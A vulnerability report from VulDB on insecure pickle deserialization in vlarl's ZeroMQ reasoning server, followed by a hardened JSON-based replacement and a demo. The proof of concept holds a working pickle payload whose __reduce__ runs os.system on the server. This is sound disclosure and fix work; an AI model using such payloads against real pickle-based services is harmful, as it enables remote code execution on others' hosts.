Submit #653279: vlarl latest Insecure Deserialization (leads to Remote Code Execution) Info

Title: vlarl latest Insecure Deserialization (leads to Remote Code Execution)
Description:

# Security Report: Remote Code Execution Vulnerability in `experiments.robot.bridge.reasoning_server::run_reasoning_server`

### Summary

A critical Remote Code Execution (RCE) vulnerability exists in `experiments.robot.bridge.reasoning_server::run_reasoning_server`. The server accepts incoming messages and deserializes them with `pickle.loads`, which lets any client that can reach the socket execute arbitrary code on the host system.

### Details

The vulnerable code is located at [experiments.robot.bridge.reasoning_server::run_reasoning_server](https://github.com/GuanxingLu/vlarl/blob/main/experiments/robot/bridge/reasoning_server.py#L64-L86).

The server listens for incoming messages via ZeroMQ (`zmq`). Received data is deserialized using `pickle.loads(message)`:

```python
while True:
    message = socket.recv()          # raw bytes from whichever client connected
    inputs = pickle.loads(message)   # Unsafe deserialization: attacker-chosen callables run here
    result = model.raw_generate(*inputs)
    socket.send(pickle.dumps(result))
```

`pickle` is inherently unsafe for untrusted data: a payload can name any importable callable and its arguments through `__reduce__`, and `pickle.loads` invokes that callable during deserialization, before the application ever sees the result.

### Proof of Concept (PoC)

1. Start the vulnerable server:

```shell
PYTHONPATH=. python3 experiments/robot/bridge/reasoning_server.py
```

2. Run the following client code to send a malicious payload:

```python
import pickle, zmq

class Payload(object):
    # __reduce__ tells pickle to rebuild this object by calling os.system(...)
    def __reduce__(self):
        import os
        return (os.system, ('echo "hacked"',))

context = zmq.Context()
socket = context.socket(zmq.REQ)
socket.connect("tcp://127.0.0.1:5623")
socket.send(pickle.dumps(Payload()))   # the server runs os.system as soon as it calls pickle.loads
```

3. The server executes `os.system('echo "hacked"')` while unpickling the message, demonstrating remote code execution. `echo` is only a harmless marker; the callable and its arguments are entirely attacker-controlled.

### Impact

- Attackers can remotely execute arbitrary system commands, leading to full server compromise.
- This may result in data theft, service disruption, ransomware, or further attacks on internal infrastructure.
### Recommendation

- **Never use `pickle.loads` on data from untrusted sources.**
- Replace `pickle` with a safe serialization format such as JSON or MessagePack, and strictly validate all inputs (types, sizes, and an allowlist of fields) before handing them to the model.

### References

- [Python pickle documentation (Security Considerations)](https://docs.python.org/3/library/pickle.html#security-concerns)
- [OWASP: Deserialization of Untrusted Data](https://owasp.org/www-community/vulnerabilities/Deserialization_of_untrusted_data)
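The hardened request loop the recommendation describes, as an added example that is not part of the original report or of the vlarl code base. Requests are JSON with an allowlisted schema; the model interface `raw_generate(prompt, max_tokens)`, the field names and the size limits are assumptions, and `FakeSocket`/`EchoModel` stand in for ZeroMQ and the real model so the block runs offline. The `Payload` class mirrors the PoC but its callable only records that it ran, which shows that `pickle.loads` executes it while the JSON decoder rejects the same bytes.

```python
"""Hardened replacement for the pickle-based request loop (added example, not vlarl code).
Assumptions: the model exposes raw_generate(prompt, max_tokens); field names,
limits and the FakeSocket/EchoModel stand-ins are illustrative."""
import json
import pickle

MAX_MESSAGE_BYTES = 64 * 1024   # assumed bound on one request
MAX_PROMPT_CHARS = 4096         # assumed bound on prompt length
MAX_TOKENS_LIMIT = 1024         # assumed bound on generation length
ALLOWED_FIELDS = {"prompt", "max_tokens"}


class BadRequest(ValueError):
    """Raised for any message that does not match the request schema."""


def decode_request(message: bytes) -> dict:
    """Parse one untrusted request: JSON only, allowlisted fields, bounded values.
    Nothing in this wire format can name a Python callable, so decoding cannot
    run attacker code the way pickle.loads does."""
    if not isinstance(message, (bytes, bytearray)):
        raise BadRequest("expected bytes")
    if len(message) > MAX_MESSAGE_BYTES:
        raise BadRequest("message too large")
    try:
        obj = json.loads(bytes(message).decode("utf-8"))
    except (UnicodeDecodeError, json.JSONDecodeError) as exc:
        raise BadRequest(f"not valid JSON: {exc}") from None
    if not isinstance(obj, dict):
        raise BadRequest("top-level value must be an object")
    unknown = set(obj) - ALLOWED_FIELDS
    if unknown:
        raise BadRequest(f"unexpected fields: {sorted(unknown)}")
    prompt = obj.get("prompt")
    if not isinstance(prompt, str) or not 0 < len(prompt) <= MAX_PROMPT_CHARS:
        raise BadRequest("prompt must be a non-empty string within the length limit")
    max_tokens = obj.get("max_tokens", 256)
    # bool is a subclass of int, so reject it explicitly
    if isinstance(max_tokens, bool) or not isinstance(max_tokens, int) \
            or not 1 <= max_tokens <= MAX_TOKENS_LIMIT:
        raise BadRequest(f"max_tokens must be an int in [1, {MAX_TOKENS_LIMIT}]")
    return {"prompt": prompt, "max_tokens": max_tokens}


def encode_response(result) -> bytes:
    return json.dumps({"ok": True, "result": result}).encode("utf-8")


def encode_error(exc: Exception) -> bytes:
    return json.dumps({"ok": False, "error": str(exc)}).encode("utf-8")


def serve_one(socket, model):
    """One REQ/REP round trip: the hardened equivalent of the report's loop body.
    A malformed request gets a JSON error reply instead of an exception, so one
    bad client cannot leave the REP socket stuck mid-exchange."""
    message = socket.recv()
    try:
        req = decode_request(message)
    except BadRequest as exc:
        socket.send(encode_error(exc))
        return None
    result = model.raw_generate(req["prompt"], req["max_tokens"])
    socket.send(encode_response(result))
    return result


# --- Why the swap matters: the PoC's payload shape, with a harmless callable ---
SIDE_EFFECTS = []


def _record(tag):
    """Stands in for os.system in the PoC; only logs that it was invoked."""
    SIDE_EFFECTS.append(tag)
    return tag


class Payload:
    def __reduce__(self):
        return (_record, ("ran inside pickle.loads",))


def demo_pickle_vs_json() -> dict:
    """Feed the same attacker bytes to pickle.loads and to decode_request."""
    evil = pickle.dumps(Payload())       # constructed attacker message
    SIDE_EFFECTS.clear()
    pickle.loads(evil)                   # the callable runs during deserialization
    ran = SIDE_EFFECTS == ["ran inside pickle.loads"]
    try:
        decode_request(evil)
        rejected = False
    except BadRequest:
        rejected = True
    return {"pickle_ran_callable": ran, "json_decoder_rejected": rejected}


class FakeSocket:
    """Minimal stand-in for a zmq REP socket so the example runs offline."""
    def __init__(self, inbound):
        self.inbound = list(inbound)
        self.outbound = []

    def recv(self):
        return self.inbound.pop(0)

    def send(self, data):
        self.outbound.append(data)


class EchoModel:
    """Stand-in for the real model: truncates the prompt to max_tokens characters."""
    def raw_generate(self, prompt, max_tokens):
        return prompt[:max_tokens]


def run_demo_server():
    """Serve one valid JSON request and one pickle payload; return results and replies."""
    sock = FakeSocket([
        b'{"prompt": "hello world", "max_tokens": 5}',   # constructed benign request
        pickle.dumps(Payload()),                          # constructed attacker request
    ])
    model = EchoModel()
    results = [serve_one(sock, model), serve_one(sock, model)]
    return results, [json.loads(reply) for reply in sock.outbound]
```

`demo_pickle_vs_json()` returns `{"pickle_ran_callable": True, "json_decoder_rejected": True}`: the pickle bytes trigger `_record` before any application code runs, while `decode_request` refuses them at the UTF-8/JSON stage. `run_demo_server()` shows the loop answering the valid request with `"hello"` and the attacker request with a JSON error instead of executing anything. A real deployment would also bind the ZeroMQ socket to a non-public interface and authenticate clients (for example with CurveZMQ), since input validation alone does not stop an unauthorised caller from consuming model time.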
Source: https://github.com/GuanxingLu/vlarl/issues/18
User: zznQ (UID 64000)
Submission: 12.09.2025 07:58 (7 months ago)
Moderation: 25.09.2025 16:12 (13 days later)
Status: accepted
VulDB Entry: 325846 [GuanxingLu vlarl up to 31abc0baf53ef8f5db666a1c882e1ea64def2997 ZeroMQ reasoning_server.py run_reasoning_server Message privilege escalation]
Points: 20
